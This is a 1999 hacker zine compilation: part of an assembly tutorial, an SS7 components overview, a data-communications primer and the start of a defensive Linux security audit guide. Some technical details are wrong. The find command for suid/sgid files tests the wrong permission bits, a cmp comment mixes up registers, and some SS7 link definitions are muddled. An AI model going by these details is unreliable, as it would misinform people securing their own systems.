[Code]
.
.
.
.
procedure_name:
.
.
.
.
Where procedure_name would be the name you give to the procedure. To call a
procedure in assemble language you have to use a jump command, these are
several of these but the most basic is simply
jmp [procedure]
this simply takes you to that procedure. There are different kinds of jump
statements though, these act rather like if statements in other languages,
and allow control flow in the program. With conditional jumps, there has to
be a way of comparing values. This is the cmp command. It works like this
cmp ah,5 ; is ax == 5?
jne no ; if it isn't 5, jump to the procedure 'no'
there are many different jump statements that use the compare command. Here
is a list of some of them
JA: Jump if the first number was above the second number
JB: Jump if the first number was below the second number
JE: Jump if both numbers were equal
JAE: Jump if the first number was above or equal to the second number
JBE: Jump if the first number was below or equal to the second number
JNA: Jump if the first number was not above the second number
JNB: Jump if the first number was not below the second number
JNE: Jumps if both numbers were not equal
JNAE: Jump if the first number was not above or equal to the second number
JNBE: Jump if the first number was not below or equal to the second number
There are other jump commands but these are the most common ones.
Next time I'll show you how to write some basic programs and generally play
about with the language. Keep reading
----------
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SS7 Network Componments ]::[OO--[ digiphreq ]-------------------
-->]OO[::::::::::::::::::::::::::::::::::::::[ digiphreq@webcrunchers.com ]--
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Components of an SS7 Network
Darkcyde Communications 1999.
digiphreq@webcrunchers.com
written 3.29.99 released a long time afterwards....
This paper is intended as a brief overview of the components that make up a
SS7 network. What they do, how they relate to other components and so on.
This file won't be very complicated, but more of a small tutorial which just
scrapes the surface of SS7 as a whole. This will focus more on networking
than anything else.
I. STP
II. SP
III. Datalinks
A. Access Links
B. Bridge Links
C. Cross Links
D. Diagonal Links
E. Extended Links
F. Fully Associated Links
IV. A Good Fuck You, I'm Out
I. STP:
The STP or Signaling Transfer Point is basically the "switch" of the
SS7 network. It's rather similar to the switch in the PSTN. While there is a
difference in that a switch of the PSTN routes voice calls/connections, the
STP routes digital traffic in the SS7 network. It basically routes to the
outside world. The pairing or networking of these is pretty simple yet quite
complex. They work on a simple ladder, tree, or more sophisticated a
hierarchical basis. You basically have some STPs that provide access and
routing for a node or local network. Next you have the STPs which
connectother network's STPs together through Access Links (discussed later).
Next you have STPs which completely run the show. They work on a much larger
scale and route everything from a selectided Wide Area Network of WAN.
Graphically it looks kind of like this.
Local to Local
Local to Regional
Regional to Regional
Regional to International
International to International
Regional to International
Regional to Regional
Local to Regional
Local to Local
II. SP:
The SP of Singaling Point is a lot like a telephone number on the
PSTN. In the case of SS7 they are called SPC or Signal Point Codes. Thus
making a service with such a code a Signaling Point. At the same time SP is
also considered a suffix to much larger grouping acronyms. You have the SSP,
SCP, AND THE MSC.
SSP- This is basically a branch of the SS7 network which
offers voice connections. Which is part of a SS7 Telephone
Network (SS7TN).
SCP- This brach offers database services. Not really part of
the whole scheme of things.
MSC- This branch is in control of the mobile units which
provide voice connections.
III. Data Links:
In the SS7 network you must send data of numerous types to other SPs
and this is done through links. Basically they don't concern themselves with
how they transmit the data, but more on what they are actually transmitting.
Which then breaks this down further so you have several types of links.
Which categorize each data type.
(A) Access Links
(B) Bridge Links
(C) Cross Links
(D) Diagonal Links
(E) Extended Links
(F) Fully Associated Links
Access Links- These provide the link between the basic node and STP
pairs. They are what opens the connection between the STP and keeps
it up and running.
Bridge Links- These are what more or less connect STPs on local to
local networks. The more of these Bridge Links you have the more
flexibility in routing the services through STPs you will have. Four
of these links are required to connect all the linked STPs of one
area to the STPs of another area.
Cross Links- In the whole scheme of making sure one of the STPs of a
pair doesn't get screwed up they don't have a way to provide service,
you have Cross Links which connect two paired STPs together as so
they are more able to communicate. In most cases the pair is doing
the same task and this can also cause the pair to speed the overall
performance.
Diagonal Links- These are exactly like Bridge Links only that they
connect the smaller network of local networks and STPs to a Regional
STP which might have several of these smaller networks hooked to it.
Just remember they are Bridge Links on steriods which connect Local
to Regional.
Extended Links- These again are nothing more than really large Bridge
Links. Instead of hooking a STP pair to a regional to then another
local STP pair these link them directly. Kind of like this.
______________Regional STP__________________
/ \
/ \
STP Pair 1----------Extended Link---------------STP Pair 2
Fully Associated Links- These occur when a company owns two or more
nodes and wishes to connect them internatlly while avoiding a STP.
This is only done when a company owns the two nodes and at no other
time. Thus making the nodes assocciated through the same company
which is why these links are called Associated Links...
Ok, well that's it. If it thoroughly confused you, read it again. If you
allready knew this crap good for you smart ass. Why don't you go learn
something new now. I hope to put a more detailed article on Components of an
SS7 Network up soon.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Electronic Data Communication ]::[OO---------[ zomba ]----------
-->]OO[:::::::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]----------
-->[OO]:::::::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]::::::
--oOo--> Covered in this Article: ]------------------------
--oOo--> --------------------------------------------------
--oOo--> Introduction ]---
--oOo--> PRINCIPLE OF ELECTRONIC DATA COMMUNICATION ]---
--OoO--> ========================================== ]---
--oOo--> --> Communications Links ]---
--oOo--> --> Communications Media ]---
--oOo--> --> Modems ]---
--oOo--> --> Multiplexors ]---
--oOo--> COMMUNICATION METHODS ]---
--oOo--> ===================== ]---
--oOo--> --> Simplex/duplex Transmission ]---
--oOo--> --> Synchronous and Asynchronous Transmission ]---
--oOo--> --> Data transfer checks ]---
--oOo--> --> Circuit Switching ]---
--oOo--> --> Packet Switching ]---
--oOo--> --> Advantages of Packet Switching ]---
--oOo--> --> Data Compression ]---
--oOo--> --> Data Encryption ]---
--oOo--> --> The TCP/IP Protocol ]---
--oOo--> --> The ISO OSI seven-layer Model ]---
--oOo--> --> Bridges and Gateways/Routers ]---
Introduction
--oOo-------
This article is meant to give you, the ereet public, a brief insight into how
data communications werk. The parts on TCP/IP and the ISO OSI seven-layer
model were origionally part of a file I was writing for ETG (now defunct) but
I thought they were relevant to this article and so have included them. If
you have been using the net for a while then the OSI model will be instantly
recognisable even if you've never seen it before as it is basically just how
the internet protocols werk and their ports etc (ie: Telnet, port 23). A lot
of this article was taken from other sources as they explained better than I
ever could :)
PRINCIPLE OF ELECTRONIC DATA COMMUNICATION
==========================================
Data communication involves sending and receiving data from one computer or
data processing device to another. Applications using for example e-mail,
supermarket EPOS (Electronic Point-Of-Sale) terminals, cash dispensers, fax
machines and video conferencing are all examples of this.
When the devices are close together, for example in the same building, they
can be linked by means of cables. However, when devices are seperated by more
than a few hundred yards, data has to be sent over a communications link (eg.
tele- phone line) and extra equipment such as a modem is required.
Communications Links
--oOo---------------
In the UK, BT, Mercury and other telcos provide services and data links.
Telephone line may be either:
--> public lines, on which the cost of sending data depends on the
length of time taken;
--> private or leased lines, for whiche there is a fixed annual fee
and line can be used 24/7 with no extra cost.
Communications Media
--oOo---------------
Communication may take place over a combination of different media.
--> twisted pair (copper cable), used in much of the PSTN;
--> coaxial cable - high quality, well-insulated cable that can transmit
data at higher speeds;
--> fibre optic cable through which pulses of light, rather than electricity,
are sent in digital form;
--> communications satallite, using one of the hundreds of satellites now
in geosynchronous orbit about 22,000 miles above the Earth (for all you
l4m3rs, geosynchronous means that they are rotating at the same speed as
the Earth and are therefore stationary relative to it);
--> microwave - similar to radio waves. Microwave stations cannot be much
more than 30 miles apart because of the Earths curvature as microwaves
travel in straight lines.
The amount of data that can be sent over the line depends partly on the
bandwidth, which is the range of frequencies that the line can carry. The
greater the bandwidth, the greater the rate at which data can be sent, as
several messages can be transmitted simultaneously.
A network that is capable of sending voice, video and computer data is called
an 'integrated services digital network' (ISDN), and this requires a high
bandwidth.
Modems
--oOo-
Telephone lines were origionally designed for speech, which is transmitted in
analogue or wave form. In order for digital data to be sent over a telephone
line, it must first be converted to analogue form and then converted back to
digital at the other end. This is achieved by means of a modem (MOdulator
DEModulator) at either end of the line.
Digital Signal Digital Signal
\ /
\ Analogue Signal /
Computer------Modem--------------------------------Modem------Computer
Multiplexors
--oOo-------
A multiplexor combines more than one input signal into a stream of data that
can be transmitted over a single communications channel. This means, for
example, that a local area network of 48 PC's could all communicate with a
mainframe at some geographically remote head office via a single leased line
attached to a multiplexor. At the mainframe end, there is likely to be a
front-end processor which will handle the communications, leaving the main
processor free for other tasks.
Computer\
\ ___ Mini
\ / mainframe
Computer---Multiplexor---Modem------------------Modem---Multiplexor---- -or-
/ \___ front-end
/ processor
Computer/
COMMUNICATION METHODS
=====================
Simplex, half-duplex and full-duplex transmission
--oOo--------------------------------------------
There are three possible modes of transmission:
--> Simplex - transmission can take place only in one direction. This type
of transmission could be used for example when the sending
device such as a temperature sensor never requires a response
from the computer.
--> Half-duplex - transmission can take place in both directions but not
simultaneously. This type of transmission is often used
between a central computer and terminals.
--> Full-duplex - transmission can take place in both directions
simultaneously. It is suitable for interactive computer
applications.
Synchronous and Asynchronous transmission
--oOo-----------------------------------
With asynchronous transmission, one character at a time is sent, with each
character being preceded by a start bit and followed by a stop bit. A parity
bit is also usually included as a check against incorrect transmission. This
type of transmission is usually used by PC's, and is fast and economical for
relatively small amounts of data.
In Synchronous transmission mode, timing signals (usually the computers
internal clock) control the rate of transmission and there is no need for
start and stop bits to accompany each character. Mainframe computers usually
use synchronous transmission. It is less error-prone than asynchronous
transmission.
Data Transfer Checks
--oOo---------------
The following checks may be made during data transmission:
--> parity checks - an extra bit is transmitted with each character to make
the number of bits set to 1 even (for even parity) or
odd for (odd parity).
--> checksum - may be sent with each block of data transmitted. All the
elements in the block (eg: words or bytes) are added together
(ignoring overflow) to produce a single element known as the
checksum, and this is stored and transmitted with the block,
and checked on receipt.
Circuit Switching
--oOo------------
An excellent example of circuit switching is the public telephone system
which uses circuit- switched paths. When a caller dials a number, the path
between the two telephones is set up by operating switches in all of the
exchanges involved in the path, and the circuit is set up and held for the
entire duration of the call (even through periods of silence). This allows
the two people on the phone ('leeto phreaks!)to hold a conversation with no
waiting at either end.
ph0ne____________
\ \ /
\ \ /
ph0ne____________Local Exchange--------Trunk Exchange /
/ | \ /
/ | \ /
ph0ne____________/ | \__Trunk Exchange----
| /
/ _________/
/ /
Trunk Exchange ph0ne
ph0ne_______ ___________/ \__________ /
\ / \ /
Local Exchange Local Exchange
/ | \ \
/ | \ \ph0ne
ph0ne ph0ne \__ph0ne
Packet Switching
--oOo-----------
In a packet switching system (PSS) data is divided into packets - fixed
length blocks of data say 128 bytes. As well as the data, each packet also
carries:
--> the source and destination address;
--> a packet sequence number so that the whole message can be correctly
reassembled;
--> a checksum (longitudinal parity check) for the purpose of error checking.
The PSS takes the form of a computer network in which each computer redirects
packets it receives to the next computer along an appropriate route to its
destination.
Advantages of packet switching
--oOo-------------------------
--> More efficient use of lines is possible.
--> Cost depends only on the number of packets sent not on distance, so all
data is transmitted at local call rates.
--> It is less likely to be affected by network failure because of the
multiple routes available to transmit data packets.
--> Security is better; data is less likely to be intercepted because the
packets may be sent along different routes or be interleaved with the
other unrelated packets.
Data Compression
--oOo-----------
Data compression is frequently used when transmitting large quantities of
data, thereby reducing the number of blocks transmitted and hence the cost.
It basically works by replacing repeated blocks by one copy of the byte plus
a count of the repetitions.
Data Encryption
--oOo----------
Data encryption is used for security purposes when transmitting or storing
confidential data. The data to be transmitted is encoded using a mathematical
algorithm or substitution of letters, so that even if it is intercepted it
cannot be read.
w0rd to the OfKIZk\$5zG w0rd to the
darkcyde ---> ENCRYPTION --> OPbNd5%6&#S --> DECRYPTION --> darkcyde
collective WeDgNC$£1GG8 collective
Plaintext Ciphertext Plaintext
The TCP/IP Protocol
--oOo--------------
Basically, TCP/IP is a set of protocols developed around the ARPAnet (where
the internet began - just in case you didn't know!) which allows co-operating
computers to share resources across a network. The most accurate name for
this set of protocols is the 'Internet Protocol Suite' - TCP and IP are just
two of the protocols in this suite. Due to the fact that TCP and IP are the
best known of all the protocols, they have been joined to create the most
common term - TCP/IP.
TCP/IP protocols map to a four layered conceptual model: Applications,
Transport, Internet, and Network Interface. Each layer on the TCP/IP model
corresponds to one or more layers on the International Standards Organisation
(ISO) seven-layer Open Systems Interconnection (OSI) model which I will go
into more detail on later in the file. Below I have attempted to draw a
diagram to shows this.
OSI Model TCP/IP Model
|--------------| |-----------------|
| Application | | |
|--------------| | |
| Presentation | | Application |
|--------------| | |
| Session | | |
|--------------| |-----------------|
| Transport | | Transport |
|--------------| |-----------------|
| Network | | Internet |
|--------------| |-----------------|
| Data-link | | |
|--------------| |Network Interface|
| Physical | | |
|--------------| |-----------------|
Defined within the four layers of TCP/IP are protocols that dictate how
computers connect and communicate. The most common of these are Transmission
Control Protocol (TCP), User Datagram Protocol (UDP), Internet Protocol (IP),
Address Resolution Protocol (ARP), and Internet Control Message Protocol
(ICMP).
Transmission Control Protocol (TCP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most common higher-level protocol in the suite. TCP guarantees
the delivery of packets, ensures proper sequencing of data, and provides a
checksum feature that validates both the packet header and its data for
accuracy. If the network either corrupts or loses a TCP packet during
transmission, TCP is responsible for re-transmitting the faulty packet. This
level of reliability makes TCP the protocol of choice for session-based data
transmission, client- server applications, and critical services such as
email.
This reliability however has its downfalls - TCP headers require additional
bits to provide proper sequencing of information, as well as a mandatory
checksum to ensure reliabilty of both the TCP packet header and the packet
data. To guarantee successful data delivery, the protocol also requires that
the recipient acknowledge successful receipt of data.
Such acknowledgements (ACK's) generate additional network traffic, thus
diminishing the rate at which data passes. To reduce the impact on
performance, most hosts send an acknowledgement for every other segment or
when a specified time interval has passed.
User Datagram Protocol (UDP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If reliability is not totally essential then UDP, a TCP compliment, offers a
connectionless datagram service that guarantees neither delivery nor correct
sequencing of delivered packets (much like IP). Higher-level protocols or
applications might provide reliability mechanisms in addition to UDP/IP. UDP
data checksums are optional, providing a way to exchange data over highly
reliable networks without unnecessarily consuming network resources or
processing time. When UDP checksums are used, they validate both the
integrity of the header and the data. ACKs are not enforced by the UDP
protocol, this is left to higher-level protocols. UDP also supports sending
data from a single sender to multiple receivers.
Internet Protocol (IP)
~~~~~~~~~~~~~~~~~~~~~~
IP provides packet delivery for all other protocols within the suite. It
provides a best-effort, connectionless delivery system for computer data.
They are not guaranteed to be delivered nor received in the order they are
sent as the protocols checksum feature only confirms the headers integrity.
The responsibitly of the data contained in the IP packets are only insured by
using higher-level protocols
Address Resolution Protocol (ARP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ARP is not directly related to data transport but is very important
nonetheless. ARP is one of the maintenance protocols that supports the TCP/IP
suite and is usually invisible to users and applications.
If two systems are to communicate over a TCP/IP network, the system sending
tha packet must map the IP address of the final destination to the physical
address of the final destination. IP acquires this physical address by
broadcasting a special inquiry packet (an ARP request packet) containing the
IP address of the destination system. All ARP-enabled systems on the local IP
network detect these broadcast messages, and the system that owns the IP
address in question replies by sending its physical address to the requester
(in an ARP reply packet). The physical/IP address is then stored in the ARP
cache of the requesting system for subsequent use.
Because the ARP reply can also be broadcast to the network, other systems on
the network can use this information to update their own ARP caches. (you can
use the 'arp' utility to view the ARP tables)
Internet Control Message Protocol (ICMP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ICMP is another of the maintenance protocols. It allows two systems on an IP
network to share status and error info. This information is often used by
network admins to detect network trouble or recover from transmission
problems. ICMP packets are stored within IP packets and are not really
considered to be a higher-level protocol.
The 'ping' utility uses the ICMP echo request and echo reply packets to
determine whether a particular IP system on a network is functional. Because
of this, the ping utility is useful for diagnosing IP networks or router
failures.
The ISO OSI seven-layer Model
--oOo------------------------
The seven layers of the Open System Interconnection (OSI) model are shown in
my diagram below. The reason for the model was to try and introduce some
standardisation into the protocols of network communication.
|-----(7)-----|-----(6)----|---(5)----|----(4)-----|---(3)----|----(2)----|----(1)----|
| Application |Presentation| Session | Transport | Network | Data Link | Physical |
|-------------|------------|----------|------------|----------|-----------|-----------|
|-------------|------------|----------|------------|----------|-----------|-----------|
| Email | POP/SMTP | POP/25 | | | |RS-X, CAT 1|
|-------------|------------|----------| | | |-----------|
| Newsgroups | Usenet | 532 | | | | ISDN |
|-------------|------------|----------| | | SLIP, PPP |-----------|
| Web | HTTP | 80 | | | | ADSL |
|Applications | | | | | | |
|-------------|------------|----------|Transmission| Internet | |-----------|
|File Transfer| FTP | 20/21 | Control | Protocol | | ATM |
|-------------|------------|----------| Protocol | Version 6|-----------|-----------|
|Host Sessions| Telnet | 23 | | | |
|-------------|------------|----------| | |-----------|-----------|
| Directory | DNS | 53 |------------|----------| | FDDI |
| Services | | | | |802.2 SNAP |-----------|
|-------------|------------|----------| | | | CAT 1-5 |
| Network Mgt.| SNMP | 161/162 | User | Internet |-----------|-----------|
|-------------|------------|----------| Datagram | Protocol | | Coaxial |
|File Services| NFS | RPC | Protocol | Version 4|Ethernet II| Cable |
| | |Portmapper| | | | |
|-------------|------------|----------|------------|----------|-----------|-----------|
By looking at the model in this way you will probably find that you are
familier with the concept even if you have never seen it before as most pople
know at the very least things like port 80 is for HTTP and 23 for Telnet etc.
The OSI model was introduced to describe how messages should be transmitted
between two computers on a network so that product implementors could produce
products that would consistently work with each other. The idea is that
messages are only transmitted in the physical layer, if the message is
received by a host that is not the target then it will not proceed up the
layers, it will just be passed on. The top four layers (4,5,6,7) are known as
the 'upper layers' and the bottom three layers (1,2,3) are known as the
'lower layers'. The upper layers are used whenever a message passes from or
to a user. The lower layers are used whenever a message passes through a host
computer.
Layer 7: Application Layer
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the layer at which communication partners are identified, quality iof
service is identified, user authenticity and privacy are considered, and any
constraints on data syntax are identified. They are /not/ the actual
applications themselves, but having said that, some applications perform
application layer functions.
Layer 6: Presentation Layer
~~~~~~~~~~~~~~~~~~~~~~~~~~~
This layer is usually a part of the operating system. It converts incoming
and outgoing data from one presentation format to another ie. ASCII to
EBCDIC. It is sometimes called the syntax layer. It also handles encryption
and compression of data.
Layer 5:
Session Layer
~~~~~~~~~~~~~~~~~~~~~~
This layer basically sets up, co-ordinates and terminates conversations,
exchanges and dialogs between the application at each end. It deals with
session and connection co-ordination. It allows application processes to
register unique addresses, such as NetBIOS names. It also has some other
support functions inclusing user authentication and resource-access security.
Layer 4: Transport Layer
~~~~~~~~~~~~~~~~~~~~~~~~
This layer manages the end-to-end control ie: determining whether all packets
have arrived. It also deals with error checking to ensure complete data
transfer.
Layer 3: Network Layer
~~~~~~~~~~~~~~~~~~~~~~
This layer handles the routing of the data ie: sending it in the right
direction to the right destination on outgoing transmissions and receiving
incoming transmissions at the packet level. It basically deals with routing
and forwarding. It control subnet traffic to allow intermediate systems to
instruct a sending station not to transmit its frame when the router's buffer
is full. If the router is busy, the network layer can instruct the sending
station to use an alternate router.
Layer 2: Data Link Layer
~~~~~~~~~~~~~~~~~~~~~~~~
This layer provides error control and synchronisation for the physical level
and does bit-stuffing for strings of 1's in excess of 5. It furnishes
'transmission protocol' knowledge and management. It establishes and
terminates a logical link (virtual-circuit connection) between two computers
identified by their unique network interface card (NIC) addresses.
Layer 1: Physical Layer
~~~~~~~~~~~~~~~~~~~~~~~
This layer conveys the bit-stream through the network at the electrical and
mechanical level. It provides the hardware means of sending and receiving
data on a carrier. Data-encoding modefies the digital-signal pattern (1s and
0s) used by the computer to better accommodate the characteristics of the
physical medium and to assist in bit and frame synchronisation. Data-encoding
resolves which signal pattern represents a binary 1, how the receiving
station recognises when a 'bit-time' starts and how the receiving station
delimits a frame.
Bridges and Gateways/Routers
--oOo-----------------------
A bridge is a connection between two local area networks. Wide area networks
may be connected throught a system of routers/gateways, a gateway being a
computer which acts as a point of connection between different networks.
Shouts and Greetz
--oOo------------
The usual peeps:
Werd to the darkcyde collective, extra shouts to hybrid, bodie and force.
Also greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf,
downtime, kryptus. L8r.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Linux System Security ]::[OO--[ by zomba ]------------------------
-->]OO[::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]:::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]:::::::::::
*****************************************************************************
************************** D4RKCYDE present (1999) **************************
*****************************************************************************
--oOo--> Covered in this Article: ]-------------------
--oOo--> ---------------------------------------------
--oOo--> Introduction ]---
--oOo--> Thinking up a Security Audit ]---
--oOo--> Part 1: The Plan ]---
--oOo--> Part 2: The Tools ]---
--oOo--> Part 3: Knowledge Gathering ]---
--oOo--> suid and sgid ]---
--oOo--> How to find suid and sgid files ]---
--oOo--> Setting suid and sgid ]---
--oOo--> File and Directory Permissions ]---
--oOo--> : Files ]---
--oOo--> : Directories ]---
--oOo--> How suid and sgid fit into this picture ]---
--oOo--> The default mode for a file or directory ]---
--oOo--> Passwords: A second look ]---
--oOo--> Related WWW sites ]---
Introduction
--oOo-------
In this phile you will learn how to protect your box from those nasty hacker-
type people, which more often than not will be your online buddies :] When
your thinking about your system security you have to remember that your
system is as secure as its weakest point. Now, this is an old saying but it
has a lot of truth in it, its like locking all your windows to stop intruders
but leaving the back-door unlocked. Read on...
Thinking up a Security Audit
--oOo-----------------------
There are three basic parts to a security audit:
o--> The Plan - (ie: a set of security apects to be evaluated)
o--> The Tools - (ie: what tools are available to you to assist
in evaluating the security aspects)
o--> Knowledge Gathering - (ie: finding out the ways in which your system
can be attacked, this includes physical security
issues, learning about he system itself and
much much more)
Part 1: The Plan
--oOo-----------
Now the plan doesn't really have to be anything more than a quick scribble on
a bit of paper that details what you are going to do. It should though,
revolve around two basic questions:
o--> What types of security problems could I have?
o--> Which ones can I attempt to fix?
In order to answer these questions, you may have to find out a bit more about
several areas of your system, these include:
o--> Accountability
o--> Change control and tracking
o--> Data integrity, including backups
o--> Physical security
o--> Privacy of Data
o--> System access
o--> System availability
Okay werd, so now you have a more detailed description of what you want to
achieve you can write up a more complex plan. As always, there will be trade-
offs. For example, privacy of data could mean that only certain people can
log into your box, which affects system access for the users. System
availibility is always in contention with the change control. For example,
when do you change that failing hard-drive on a 24/7 system? What i'm trying
to get at here is that the detailed plan that is developed should include a
set of goals; a way of tracking the progression of the goals, including
changes to the system; and a knowledge base of what types of tools are needed
to do the job.
Part 2: The Tools
--oOo------------
Okay, so now you should have a fair idea of what you want to do, now you have
to think about *how* you are going to do it. A number of tewls are available
on the internet, including tools to check passwords, check system security,
and protect your system. CERT, CIAC, and the Linux Emergancy Response Team
are often good sources of information for both the beginner and advanced
sysadmin.
The following is a list of tools, all freely available if you look for them,
make sure you look around for some other tools as well though!
--> cops [ A set of programs; each checks a different aspect ]
[ of security on a *nix system. If any potential ]
[ security holes do exist, the results are either ]
[ mailed or saved to a report file. ]
--> crack [ A program designed to find standard *nix eight- ]
[ character DES-encrypted passwords by standard ]
[ guessing techniques. ]
--> deslogin [ A remote login program that can be used safely ]
[ across insecure networks. ]
--> findsuid.tar.Z [ Finds changes in setuid (set user ID) and setgid ]
[ (set group ID) files. ]
--> finger daemon [ Secure finger daemon for *nix. Should compile out-]
[ of-the-box nearly anywhere. ]
--> freestone [ A portable, fully functional firewall ]
[ implementation. ]
--> gabriel [ A satan detector. gabriel gives the sysadmin an ]
[ early warning of possible network intrusions by ]
[ detecting and identifying satan's network probe. ]
--> ipfilter [ A free packet filter that can be incorperated into]
[ any of the supported operating systems, providing ]
[ IP packet-level filtering per interface. ]
--> ipfirewall [ An IP packet filtering tool, similar to the packet]
[ filtering facilities provided by most commercial ]
[ routers. ]
--> kerberos [ A network authentication system for use on ]
[ physically insecure networks. It allows entities ]
[ communicating over a network to prove their ]
[ identities to each other while preventing eves- ]
[ dropping or replay attacks. ]
--> merlin [ Takes a popular secur1ty tewl (such as tiger, ]
[ tripwire, cops, crack, or spi) and provides it ]
[ easy-to-use, consistent graphical interface, ]
[ simplifying and enhancing its capabilities. ]
--> npasswd [ passwd replacement with password sanity check. ]
--> obvious-pw.tar.Z [ An obvious password detector. ]
--> opie [ Provides a one-time password system for POSIX- ]
[ compliant UNIX-like operating systems. ]
--> pcheck.tar.Z [ Checks formats of /etc/passwd; verifies root ]
[ default shell and passwd fields. ]
--> Plugslot Ltd. [ PCP/PSP UNIX network security and configuration ]
[ monitor. ]
--> rsaeuro [ A cryptographic tewl-kit providing various ]
[ functions for the use of digital signatures, data ]
[ encryption, and supporting areas (PEM encoding, ]
[ random number generation, and so on). ]
--> rscan [ Allows sysadmins to execute complex (or simple) ]
[ scanner scripts on one (or many) machines and ]
[ create clean, formatted reports in either ASCII or]
[ HTML. ]
--> satan [ The secur1ty analysis tewl for auditing networks. ]
[ In its simplest (and default) mode, it gathers as ]
[ much information about remote hosts and networks ]
[ as possible by examining such network services ]
[ such as finger, NFS, NIS, ftp and tftp, rexd, and ]
[ many others. ]
--> ssh [ Secure shell - a remote login program. ]
--> tcp wrappers [ Monitor and control remote access to your local ]
[ tftp, exec, ftp, rsh, telnet, rlogin, finger and ]
[ systat daemon. ]
--> tiger [ Scans a system for potential secur1ty problems. ]
--> tis firewall toolkit [ Includes enhancements and bug fixes from V1.2, and]
[ new proxies for HTTP/Gopher and X11. ]
--> tripwire [ Monitors system for secur1ty break-in attempts. ]
--> xp-beta [ An application gateway of X11 protocol. It is ]
[ designed to be used at a site that has a firewall ]
[ and uses SOCKS and/or CERN WWW Proxy. ]
--> xroute [ Routes X packets from one machine to another. ]
All of the above tools will be available from my website:
members.xoom.com/phuk when it is finally finished and online.
Part 3: Knowledge Gathering
--oOo----------------------
There is not really that much to say about knowledge gathering other than to
make sure you find out whether or not the system users and the keepers of the
sacred root password (hopefully just yourself) all follow the security
procedures that you have put into place - and that they gather all the
knowledge necessary to do so. One of the major points of this is that you
don'r use that same passwords for everything, for example, I know someone
whose password is a variation of his name, he uses this password for
*everything*, ISP accounts, web email services, he even used to spell it out
numerically for his VMB pass. If you do this now, then DON'T, it may be safe
to use as the root password because it is hard for someone to find it out but
if they find out your pwd for something less secure that just happens to be
the same pass for root, then you are fux0red.
File secur1ty is another big issue. The use of umask (file creation masks)
should be mandated. It should also be set to the maximum amount possible. It
is easy to change a particular file to give someone else access to it. It is
difficult, if not impossible, to know who is looking at your files. The
sensitivity of your data, of course, would certainly determine the exact level
of security placed on the file. In extremely sensitive cases, such as all your
h/p related files, it should also be encrypted (make sure you use a lengthy
pass-word as well, mine is a 34 character sentance containing random
upper/lower case letters and numbers, which I have memorised).
It might also be a good idea to occasionally search for programs that have
suid or sgid capability.
suid and sgid
--oOo--------
Many people talk about suid (set user ID) and sgid (set group ID) without
really knowing that much about them. The basic concept behind them is that a
program (not a script) is set so that it is run as the owner or group set for
the program, not the person running the program. For example, say you have a
program with suid set, and its owner is root. Anyone running that program
runs the program with the persmissions of the owner instead of his or her own
permissions. The passwd command is a good example of this. The file
/etc/passwd is writable by root, and readable by everyone. The passwd program
has suid turned on. Therefore, anyone can run the program and change their
password. Because the program is running as the user root, not the actual
user, the etc/passwd file can be written to.
The same concept is true of sgid. Instead of the program running with the
permissions and authority of the group associated with the person calling the
program, the program is run with the permissions and authority of the group
that is associated with the program.
How to find suid and sgid files
--oOo--------------------------
Using the find command, you can search the entire system looking for programs
with their suid or sgid turned on:
find / -perm -200 -o -perm -400 -print
A good idea is to run the above command when you first load a system, saving
its output to a file readable only by root. Future searches can be performed
and compared to this "clean" list of suid and sgid files. This way you can
insure that only the files that should have these permissions actaully do.
Setting suid and sgid
--oOo----------------
The set user ID and set group ID can be powerful tools for giving the users
the ability to perform tasks without the other problems that could arise with
the user having the actual permissions of that group or user. However, these
can be dangerous tools too. When considering changing the permissions on a
file to be either suid or sgid, keep in mind these two things:
o--> Use the lowest permissions needed to accomplish a task.
o--> Watch for back doors.
Using the lowest permissions means not giving a file an suid of root if at
all possible. Often, a less priveleged person can be configured to do the
task. The same goes for sgid. Many times, setting the group to the
appropriate non-sys group will accomplish the same task while limiting other
potential problems.
Back doors/Trojans come in many forms. A program that allows a shell is a back
door. A program that has multiple entrances and exits are back doors. Keep in
mind that if a user can run an suid program set to root and the program
contains a back door (the user can get out of the program to a prompt without
actually exiting the program), then the system keeps an effective user ID as
what the program is set to (ie: root), and the user now has root permissions.
With that said, how do you set a file to have the effective user be the owner of
the file, or the effective group be the group of the file, instead of running as
the user ID or the users group ID of the person invoking the file? The
permissions are added with the chmod command, as follows:
chmod u+s file(s)
chmod g+s file(s)
The first example sets suid for the file(s) listed. The second example sets
the sgid of the file(s) listed. Remember, suid sets the effective ID of the
process to the owner associated with the file, and sgid sets the effective
groups ID of the process to the group associated with the file. These cannot
be set on non-executables.
File and Directory Permissions
--oOo-------------------------
File and directory permissions are the basics for providing security on a
system. These, along with the authentication system, provide the basis for
all security. Unfortunately, many people do not know what permissions on
directories mean, or they assume they mean the same thing they do on files.
The following section describes the permissions on files; after that, the
permissions on directories are described.
Files
--o--
The permissions for files are split into three different sections: the owner
of the files, the group associated with the file, and everyone else
(the w0rld). Each section has its own set of file permissions. These
permissions provide the ability to read, write, and execute (or, of course,
to deny the same). These permissions are called a files 'filemode'. Filemodes
are set with the chmod command.
There are two ways to specify the permissions of the object. You can use the
numeric coding system or the letter coding system. Using the letter coding
system, the three sections are referred to as 'u' for user, 'g' for group, and 'o'
for other, or 'a' for all three. There are three basic types of permissions:
'r' for read, 'w' for write or 'x' for execute. Combinations of r, w and x
with the three groups provide the permissions for files. In the following
example, the owner of the file (me) has read, write, and execute permissions,
while everyone else has read access only.
shell:/home/zomba$ ls -l 0d4yz
-rwxr--r-- 1 zomba users 10 May 21 48:32 0d4yz
The command ls -l tells the computer to give you a long (-l) listing (ls) of
the file (0d4yz). The resulting line is shown in the second code line, and it
tells you a number of things about the file. First, it tells you the
